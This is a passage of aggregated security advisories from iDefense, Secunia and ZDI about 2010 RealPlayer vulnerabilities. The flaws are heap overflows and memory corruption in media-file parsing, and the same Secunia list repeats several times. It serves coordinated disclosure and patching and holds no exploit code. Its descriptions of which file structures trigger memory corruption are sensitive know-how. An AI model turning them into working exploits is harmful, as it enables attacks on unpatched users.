control. An attacker could host a Web page containing a malformed file. Alternatively a
malicious media file could be attached within an e-mail file.
IV.
V. WORKAROUND
iDefense is currently unaware of any workaround for this issue.
VI. VENDOR RESPONSE
RealNetworks has released a patch which addresses this issue.
Information about downloadable vendor updates can be found by clicking
on the URLs shown.
http://service.real.com/realplayer/security/12102010_player/en/
VII. CVE INFORMATION
The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2010-4387 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.
VIII. DISCLOSURE TIMELINE
05/12/2010 Initial Contact
05/12/2010 Initial Response
12/10/2010 Coordinated public disclosure
IX.
Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php
Free tools, research and upcoming events
http://labs.idefense.com/
X. LEGAL NOTICES
Copyright \xa9 2010 iDefense, Inc.
Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice@idefense.com for permission.
Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information
| VAR-201012-0245 | CVE-2010-4384 | RealNetworks RealPlayer of RealMedia Media code header arbitrary code execution vulnerability |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Array index error in RealNetworks RealPlayer 11.0 through 11.1, RealPlayer Enterprise 2.1.2, Mac RealPlayer 11.0 through 11.1, Linux RealPlayer 11.0.2.1744, and possibly HelixPlayer 1.0.6 and other versions, allows remote attackers to execute arbitrary code via a malformed Media Properties Header (aka MDPR) in a RealMedia file. The application explicitly trusts an index in this data structure which is used to seek into an array of objects. If an attacker can allocate controlled data at some point after this array, an attacker can then get their fabricated object to get called leading to code execution under the context of the current user. Real Networks RealPlayer is prone to a memory-corruption vulnerability because the software fails to perform adequate boundary-checks on user-supplied data. Failed exploit attempts will result in a denial-of-service condition.
This issue affects Windows RealPlayer 11.1 and prior, RealPlayer Enterprise 2.1.2 and prior, Mac RealPlayer 11.0.1.949 and prior, and Linux RealPlayer 11.0.2.1744 and prior.
NOTE: This issue was previously discussed in BID 45327 (Real Networks RealPlayer Multiple Remote Vulnerabilities) but has been given its own record to better document it. RealNetworks RealNetworks RealPlayer is a set of media player products developed by RealNetworks in the United States. The product provides features for downloading/converting videos (in web pages), editing videos, managing media files, and more. ----------------------------------------------------------------------
Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM).
Request a free trial:
http://secunia.com/products/corporate/vim/
----------------------------------------------------------------------
TITLE:
RealPlayer Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA38550
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/38550/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=38550
RELEASE DATE:
2010-12-12
DISCUSS ADVISORY:
http://secunia.com/advisories/38550/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/38550/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=38550
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Multiple vulnerabilities have been reported in RealPlayer, which can
be exploited by malicious people to compromise a user's system.
1) An error exists when parsing RealAudio content encoded using the
"cook" codec. This can be exploited to trigger the use of
uninitialised memory and potentially cause a memory corruption via
e.g. a specially crafted RealMedia file.
2) An error in the handling of errors encountered while decoding
"cook"-encoded audio content can be exploited to trigger the use of
uninitialised memory and potentially free an arbitrary address.
3) An error in the parsing of AAC audio content can be exploited to
corrupt memory via specially crafted spectral data.
4) An array indexing error when parsing Media Properties Header
(MDPR) in a RealMedia file can be exploited to corrupt memory.
5) An input validation error when parsing a RealMedia file can be
exploited to cause a buffer overflow via a specially crafted
multi-rate audio stream.
6) An error in the processing of the "StreamTitle" tag in a SHOUTcast
stream using the ICY protocol can be exploited to cause an allocation
failure for heap memory, which can result in the usage of freed
pointers.
7) An integer overflow error when parsing a MLLT atom in an .AAC file
can be exploited to cause a buffer overflow.
8) An input validation error in the "pnen3260.dll" module in the
parsing of TIT2 atoms within AAC files can be exploited to corrupt
memory.
9) An integer overflow in the parsing of GIF87a files over the
streaming protocol RTSP can be exploited to cause a buffer overflow
via a large "Screen Width" size in the "Screen Descriptor" header.
10) An error in the parsing of audio codec information in a Real
Audio media file can be exploited to to cause a heap-based buffer
overflow via a large number of subbands.
11) An input validation error in drv2.dll when decompressing RV20
video streams can be exploited to corrupt heap memory.
12) An unspecified error related to "SIPR" parsing can be exploited
to corrupt heap memory.
13) An unspecified error related to "SOUND" processing can be
exploited to corrupt heap memory.
14) An unspecified error related to "AAC" processing can be exploited
to corrupt heap memory.
15) An unspecified error related to "RealMedia" processing can be
exploited to corrupt heap memory.
16) An unspecified error related to "RA5" processing can be exploited
to corrupt heap memory.
17) An integer overflow in "drv1.dll" when parsing SIPR stream
metadata can be exploited to cause a heap-based buffer overflow, e.g.
via the RealPlayer ActiveX control.
18) An input validation error in the processing of RealMedia files
can be exploited to corrupt heap memory.
19) An input validation error in the RealAudio codec when processing
RealMedia files can be exploited to corrupt heap memory.
20) An error in the "HandleAction" method in the RealPlayer ActiveX
control allows users to download and execute scripts in the "Local
Zone".
21) Input sanitisation errors in the "Custsupport.html", "Main.html",
and "Upsell.htm" components can be exploited to inject arbitrary code
into the RealOneActiveXObject process and load unsafe controls.
22) A boundary error in the parsing of cook-specific data used for
initialization can be exploited to cause a heap-based buffer
overflow.
23) An error in the parsing of MLTI chunks when processing Internet
Video Recording (.ivr) files can be exploited to cause a heap-based
buffer overflow via an invalid size for an embedded MDPR chunk.
24) An error in the parsing of MLTI chunks when processing Internet
Video Recording (.ivr) files can be exploited to corrupt heap memory
via an invalid number streams within the chunk.
25) An input validation error when parsing the RMX file format can be
exploited to cause a heap-based buffer overflow.
26) An error when decoding data for particular mime types within a
RealMedia file can be exploited to cause a heap-based buffer
overflow.
27) An error in the parsing of server headers can be exploited to
cause a heap-based buffer overflow via an image tag pointing to a
malicious server, which causes the player to fetch a remote file.
28) An error in the implementation of the Advanced Audio Coding
compression when decoding a conditional component of a data block
within an AAC frame can be exploited to corrupt memory.
SOLUTION:
Upgrade to RealPlayer 14.0.0 or later.
PROVIDED AND/OR DISCOVERED BY:
1, 2) Alin Rad Pop, Secunia Research.
3) Carsten Eiram, Secunia Research.
4) Anonymous and Hossein Lotfi, reported via ZDI.
5 - 11, 20, 21) Anonymous, reported via ZDI.
12 - 14) The vendor credits Nicolas Joly, Vupen
15) The vendor credits Chaouki Bekrar, Vupen
17) Aaron Portnoy, Zef Cekaj, and Logan Brown of TippingPoint DVLabs
18, 19) Omair, reported via iDefense.
22, 28) Damian Put, reported via ZDI.
23, 24) Aaron Portnoy and Logan Brown of TippingPoint DVLabs and Team
lollersk8erz.
25) Sebastian Apelt, reported via ZDI.
26) Sebastian Apelt and Andreas Schmidt, reported via ZDI.
27) AbdulAziz Hariri, reported via ZDI.
ORIGINAL ADVISORY:
Secunia Research:
http://secunia.com/secunia_research/2010-9/
http://secunia.com/secunia_research/2010-14/
http://secunia.com/secunia_research/2010-15/
RealNetworks:
http://service.real.com/realplayer/security/12102010_player/en/
http://realnetworksblog.com/?p=2216
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-10-268/
http://www.zerodayinitiative.com/advisories/ZDI-10-266/
http://www.zerodayinitiative.com/advisories/ZDI-10-270/
http://www.zerodayinitiative.com/advisories/ZDI-10-273/
http://www.zerodayinitiative.com/advisories/ZDI-10-269/
http://www.zerodayinitiative.com/advisories/ZDI-10-271/
http://www.zerodayinitiative.com/advisories/ZDI-10-272/
http://www.zerodayinitiative.com/advisories/ZDI-10-274/
http://www.zerodayinitiative.com/advisories/ZDI-10-275/
http://www.zerodayinitiative.com/advisories/ZDI-10-276/
http://www.zerodayinitiative.com/advisories/ZDI-10-277/
http://www.zerodayinitiative.com/advisories/ZDI-10-278/
http://www.zerodayinitiative.com/advisories/ZDI-10-279/
http://www.zerodayinitiative.com/advisories/ZDI-10-281/
http://www.zerodayinitiative.com/advisories/ZDI-10-280/
http://www.zerodayinitiative.com/advisories/ZDI-10-282/
http://www.zerodayinitiative.com/advisories/ZDI-10-267/
TippingPoint DVLabs:
http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0216.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0212.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0213.html
iDefense Labs:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=883
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=884
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. ZDI-10-268: RealNetworks RealPlayer Media Properties Header Parsing Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-268
December 10, 2010
-- CVE ID:
CVE-2010-4384
-- CVSS:
9, (AV:N/AC:L/Au:N/C:P/I:P/A:C)
-- Affected Vendors:
RealNetworks
-- Affected Products:
RealNetworks RealPlayer
-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 6853.
-- Vendor Response:
RealNetworks has issued an update to correct this vulnerability. More
details can be found at:
http://service.real.com/realplayer/security/12102010_player/en/
-- Disclosure Timeline:
2009-02-24 - Vulnerability reported to vendor
2010-12-10 - Coordinated public release of advisory
-- Credit:
This vulnerability was discovered by:
* Anonymous
* Hossein Lotfi
-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.
Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com
The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.
Our vulnerability disclosure policy is available online at:
http://www.zerodayinitiative.com/advisories/disclosure_policy/
Follow the ZDI on Twitter:
http://twitter.com/thezdi
| VAR-201012-0244 | CVE-2010-4383 | RealNetworks RealPlayer In RA5 Heap overflow vulnerability |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Heap-based buffer overflow in RealNetworks RealPlayer 11.0 through 11.1, RealPlayer SP 1.0 through 1.1.4, RealPlayer Enterprise 2.1.2, Mac RealPlayer 11.0 through 12.0.0.1444, Linux RealPlayer 11.0.2.1744, and possibly HelixPlayer 1.0.6 and other versions, allows remote attackers to have an unspecified impact via a crafted RA5 file. RealNetworks RealPlayer Is RA5 A heap overflow vulnerability exists.Details of the impact of this vulnerability are unknown.
Successfully exploiting this issue allows attackers to execute arbitrary code in the context of the vulnerable application. Failed exploit attempts will result in a denial-of-service condition.
NOTE: This issue was previously discussed in BID 45327 (Real Networks RealPlayer Multiple Remote Vulnerabilities) but has been given its own record to better document it. RealNetworks RealNetworks RealPlayer is a set of media player products developed by RealNetworks in the United States. The product provides features for downloading/converting videos (in web pages), editing videos, managing media files, and more. ----------------------------------------------------------------------
Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM).
Request a free trial:
http://secunia.com/products/corporate/vim/
----------------------------------------------------------------------
TITLE:
RealPlayer Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA38550
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/38550/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=38550
RELEASE DATE:
2010-12-12
DISCUSS ADVISORY:
http://secunia.com/advisories/38550/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/38550/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=38550
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Multiple vulnerabilities have been reported in RealPlayer, which can
be exploited by malicious people to compromise a user's system.
1) An error exists when parsing RealAudio content encoded using the
"cook" codec. This can be exploited to trigger the use of
uninitialised memory and potentially cause a memory corruption via
e.g. a specially crafted RealMedia file.
2) An error in the handling of errors encountered while decoding
"cook"-encoded audio content can be exploited to trigger the use of
uninitialised memory and potentially free an arbitrary address.
3) An error in the parsing of AAC audio content can be exploited to
corrupt memory via specially crafted spectral data.
4) An array indexing error when parsing Media Properties Header
(MDPR) in a RealMedia file can be exploited to corrupt memory.
5) An input validation error when parsing a RealMedia file can be
exploited to cause a buffer overflow via a specially crafted
multi-rate audio stream.
6) An error in the processing of the "StreamTitle" tag in a SHOUTcast
stream using the ICY protocol can be exploited to cause an allocation
failure for heap memory, which can result in the usage of freed
pointers.
7) An integer overflow error when parsing a MLLT atom in an .AAC file
can be exploited to cause a buffer overflow.
8) An input validation error in the "pnen3260.dll" module in the
parsing of TIT2 atoms within AAC files can be exploited to corrupt
memory.
9) An integer overflow in the parsing of GIF87a files over the
streaming protocol RTSP can be exploited to cause a buffer overflow
via a large "Screen Width" size in the "Screen Descriptor" header.
10) An error in the parsing of audio codec information in a Real
Audio media file can be exploited to to cause a heap-based buffer
overflow via a large number of subbands.
11) An input validation error in drv2.dll when decompressing RV20
video streams can be exploited to corrupt heap memory.
12) An unspecified error related to "SIPR" parsing can be exploited
to corrupt heap memory.
13) An unspecified error related to "SOUND" processing can be
exploited to corrupt heap memory.
14) An unspecified error related to "AAC" processing can be exploited
to corrupt heap memory.
15) An unspecified error related to "RealMedia" processing can be
exploited to corrupt heap memory.
16) An unspecified error related to "RA5" processing can be exploited
to corrupt heap memory.
17) An integer overflow in "drv1.dll" when parsing SIPR stream
metadata can be exploited to cause a heap-based buffer overflow, e.g.
via the RealPlayer ActiveX control.
18) An input validation error in the processing of RealMedia files
can be exploited to corrupt heap memory.
19) An input validation error in the RealAudio codec when processing
RealMedia files can be exploited to corrupt heap memory.
20) An error in the "HandleAction" method in the RealPlayer ActiveX
control allows users to download and execute scripts in the "Local
Zone".
21) Input sanitisation errors in the "Custsupport.html", "Main.html",
and "Upsell.htm" components can be exploited to inject arbitrary code
into the RealOneActiveXObject process and load unsafe controls.
22) A boundary error in the parsing of cook-specific data used for
initialization can be exploited to cause a heap-based buffer
overflow.
23) An error in the parsing of MLTI chunks when processing Internet
Video Recording (.ivr) files can be exploited to cause a heap-based
buffer overflow via an invalid size for an embedded MDPR chunk.
24) An error in the parsing of MLTI chunks when processing Internet
Video Recording (.ivr) files can be exploited to corrupt heap memory
via an invalid number streams within the chunk.
25) An input validation error when parsing the RMX file format can be
exploited to cause a heap-based buffer overflow.
26) An error when decoding data for particular mime types within a
RealMedia file can be exploited to cause a heap-based buffer
overflow.
27) An error in the parsing of server headers can be exploited to
cause a heap-based buffer overflow via an image tag pointing to a
malicious server, which causes the player to fetch a remote file.
28) An error in the implementation of the Advanced Audio Coding
compression when decoding a conditional component of a data block
within an AAC frame can be exploited to corrupt memory.
SOLUTION:
Upgrade to RealPlayer 14.0.0 or later.
PROVIDED AND/OR DISCOVERED BY:
1, 2) Alin Rad Pop, Secunia Research.
3) Carsten Eiram, Secunia Research.
4) Anonymous and Hossein Lotfi, reported via ZDI.
5 - 11, 20, 21) Anonymous, reported via ZDI.
12 - 14) The vendor credits Nicolas Joly, Vupen
15) The vendor credits Chaouki Bekrar, Vupen
17) Aaron Portnoy, Zef Cekaj, and Logan Brown of TippingPoint DVLabs
18, 19) Omair, reported via iDefense.
22, 28) Damian Put, reported via ZDI.
23, 24) Aaron Portnoy and Logan Brown of TippingPoint DVLabs and Team
lollersk8erz.
25) Sebastian Apelt, reported via ZDI.
26) Sebastian Apelt and Andreas Schmidt, reported via ZDI.
27) AbdulAziz Hariri, reported via ZDI.
ORIGINAL ADVISORY:
Secunia Research:
http://secunia.com/secunia_research/2010-9/
http://secunia.com/secunia_research/2010-14/
http://secunia.com/secunia_research/2010-15/
RealNetworks:
http://service.real.com/realplayer/security/12102010_player/en/
http://realnetworksblog.com/?p=2216
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-10-268/
http://www.zerodayinitiative.com/advisories/ZDI-10-266/
http://www.zerodayinitiative.com/advisories/ZDI-10-270/
http://www.zerodayinitiative.com/advisories/ZDI-10-273/
http://www.zerodayinitiative.com/advisories/ZDI-10-269/
http://www.zerodayinitiative.com/advisories/ZDI-10-271/
http://www.zerodayinitiative.com/advisories/ZDI-10-272/
http://www.zerodayinitiative.com/advisories/ZDI-10-274/
http://www.zerodayinitiative.com/advisories/ZDI-10-275/
http://www.zerodayinitiative.com/advisories/ZDI-10-276/
http://www.zerodayinitiative.com/advisories/ZDI-10-277/
http://www.zerodayinitiative.com/advisories/ZDI-10-278/
http://www.zerodayinitiative.com/advisories/ZDI-10-279/
http://www.zerodayinitiative.com/advisories/ZDI-10-281/
http://www.zerodayinitiative.com/advisories/ZDI-10-280/
http://www.zerodayinitiative.com/advisories/ZDI-10-282/
http://www.zerodayinitiative.com/advisories/ZDI-10-267/
TippingPoint DVLabs:
http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0216.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0212.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0213.html
iDefense Labs:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=883
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=884
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201012-0242 | CVE-2010-4381 | RealNetworks RealPlayer In AAC Heap overflow vulnerability |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Heap-based buffer overflow in RealNetworks RealPlayer 11.0 through 11.1, RealPlayer SP 1.0 through 1.1.4, RealPlayer Enterprise 2.1.2, and Mac RealPlayer 11.0 through 12.0.0.1444 allows remote attackers to have an unspecified impact via a crafted AAC file. RealNetworks RealPlayer Is AAC A heap overflow vulnerability exists.Details of the impact of this vulnerability are unknown. Real Networks RealPlayer is prone to a heap overflow vulnerability because the software fails to perform adequate boundary-checks on user-supplied data.
Successfully exploiting this issue allows attackers to execute arbitrary code in the context of the vulnerable application. Failed exploit attempts will result in a denial-of-service condition.
NOTE: This issue was previously discussed in BID 45327 (Real Networks RealPlayer Multiple Remote Vulnerabilities) but has been given its own record to better document it. RealPlayer is a software package released and maintained by Real Networks, which can be used to play multimedia files encoded in Real Media format. ----------------------------------------------------------------------
Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM).
Request a free trial:
http://secunia.com/products/corporate/vim/
----------------------------------------------------------------------
TITLE:
RealPlayer Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA38550
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/38550/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=38550
RELEASE DATE:
2010-12-12
DISCUSS ADVISORY:
http://secunia.com/advisories/38550/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/38550/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=38550
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Multiple vulnerabilities have been reported in RealPlayer, which can
be exploited by malicious people to compromise a user's system.
1) An error exists when parsing RealAudio content encoded using the
"cook" codec. This can be exploited to trigger the use of
uninitialised memory and potentially cause a memory corruption via
e.g. a specially crafted RealMedia file.
2) An error in the handling of errors encountered while decoding
"cook"-encoded audio content can be exploited to trigger the use of
uninitialised memory and potentially free an arbitrary address.
3) An error in the parsing of AAC audio content can be exploited to
corrupt memory via specially crafted spectral data.
4) An array indexing error when parsing Media Properties Header
(MDPR) in a RealMedia file can be exploited to corrupt memory.
5) An input validation error when parsing a RealMedia file can be
exploited to cause a buffer overflow via a specially crafted
multi-rate audio stream.
6) An error in the processing of the "StreamTitle" tag in a SHOUTcast
stream using the ICY protocol can be exploited to cause an allocation
failure for heap memory, which can result in the usage of freed
pointers.
7) An integer overflow error when parsing a MLLT atom in an .AAC file
can be exploited to cause a buffer overflow.
8) An input validation error in the "pnen3260.dll" module in the
parsing of TIT2 atoms within AAC files can be exploited to corrupt
memory.
9) An integer overflow in the parsing of GIF87a files over the
streaming protocol RTSP can be exploited to cause a buffer overflow
via a large "Screen Width" size in the "Screen Descriptor" header.
10) An error in the parsing of audio codec information in a Real
Audio media file can be exploited to to cause a heap-based buffer
overflow via a large number of subbands.
11) An input validation error in drv2.dll when decompressing RV20
video streams can be exploited to corrupt heap memory.
12) An unspecified error related to "SIPR" parsing can be exploited
to corrupt heap memory.
13) An unspecified error related to "SOUND" processing can be
exploited to corrupt heap memory.
14) An unspecified error related to "AAC" processing can be exploited
to corrupt heap memory.
15) An unspecified error related to "RealMedia" processing can be
exploited to corrupt heap memory.
16) An unspecified error related to "RA5" processing can be exploited
to corrupt heap memory.
17) An integer overflow in "drv1.dll" when parsing SIPR stream
metadata can be exploited to cause a heap-based buffer overflow, e.g.
via the RealPlayer ActiveX control.
18) An input validation error in the processing of RealMedia files
can be exploited to corrupt heap memory.
19) An input validation error in the RealAudio codec when processing
RealMedia files can be exploited to corrupt heap memory.
20) An error in the "HandleAction" method in the RealPlayer ActiveX
control allows users to download and execute scripts in the "Local
Zone".
21) Input sanitisation errors in the "Custsupport.html", "Main.html",
and "Upsell.htm" components can be exploited to inject arbitrary code
into the RealOneActiveXObject process and load unsafe controls.
22) A boundary error in the parsing of cook-specific data used for
initialization can be exploited to cause a heap-based buffer
overflow.
23) An error in the parsing of MLTI chunks when processing Internet
Video Recording (.ivr) files can be exploited to cause a heap-based
buffer overflow via an invalid size for an embedded MDPR chunk.
24) An error in the parsing of MLTI chunks when processing Internet
Video Recording (.ivr) files can be exploited to corrupt heap memory
via an invalid number streams within the chunk.
25) An input validation error when parsing the RMX file format can be
exploited to cause a heap-based buffer overflow.
26) An error when decoding data for particular mime types within a
RealMedia file can be exploited to cause a heap-based buffer
overflow.
27) An error in the parsing of server headers can be exploited to
cause a heap-based buffer overflow via an image tag pointing to a
malicious server, which causes the player to fetch a remote file.
28) An error in the implementation of the Advanced Audio Coding
compression when decoding a conditional component of a data block
within an AAC frame can be exploited to corrupt memory.
SOLUTION:
Upgrade to RealPlayer 14.0.0 or later.
PROVIDED AND/OR DISCOVERED BY:
1, 2) Alin Rad Pop, Secunia Research.
3) Carsten Eiram, Secunia Research.
4) Anonymous and Hossein Lotfi, reported via ZDI.
5 - 11, 20, 21) Anonymous, reported via ZDI.
12 - 14) The vendor credits Nicolas Joly, Vupen
15) The vendor credits Chaouki Bekrar, Vupen
17) Aaron Portnoy, Zef Cekaj, and Logan Brown of TippingPoint DVLabs
18, 19) Omair, reported via iDefense.
22, 28) Damian Put, reported via ZDI.
23, 24) Aaron Portnoy and Logan Brown of TippingPoint DVLabs and Team
lollersk8erz.
25) Sebastian Apelt, reported via ZDI.
26) Sebastian Apelt and Andreas Schmidt, reported via ZDI.
27) AbdulAziz Hariri, reported via ZDI.
ORIGINAL ADVISORY:
Secunia Research:
http://secunia.com/secunia_research/2010-9/
http://secunia.com/secunia_research/2010-14/
http://secunia.com/secunia_research/2010-15/
RealNetworks:
http://service.real.com/realplayer/security/12102010_player/en/
http://realnetworksblog.com/?p=2216
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-10-268/
http://www.zerodayinitiative.com/advisories/ZDI-10-266/
http://www.zerodayinitiative.com/advisories/ZDI-10-270/
http://www.zerodayinitiative.com/advisories/ZDI-10-273/
http://www.zerodayinitiative.com/advisories/ZDI-10-269/
http://www.zerodayinitiative.com/advisories/ZDI-10-271/
http://www.zerodayinitiative.com/advisories/ZDI-10-272/
http://www.zerodayinitiative.com/advisories/ZDI-10-274/
http://www.zerodayinitiative.com/advisories/ZDI-10-275/
http://www.zerodayinitiative.com/advisories/ZDI-10-276/
http://www.zerodayinitiative.com/advisories/ZDI-10-277/
http://www.zerodayinitiative.com/advisories/ZDI-10-278/
http://www.zerodayinitiative.com/advisories/ZDI-10-279/
http://www.zerodayinitiative.com/advisories/ZDI-10-281/
http://www.zerodayinitiative.com/advisories/ZDI-10-280/
http://www.zerodayinitiative.com/advisories/ZDI-10-282/
http://www.zerodayinitiative.com/advisories/ZDI-10-267/
TippingPoint DVLabs:
http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0216.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0212.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0213.html
iDefense Labs:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=883
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=884
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201012-0240 | CVE-2010-4379 | RealNetworks RealPlayer In SIPR Heap overflow vulnerability |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
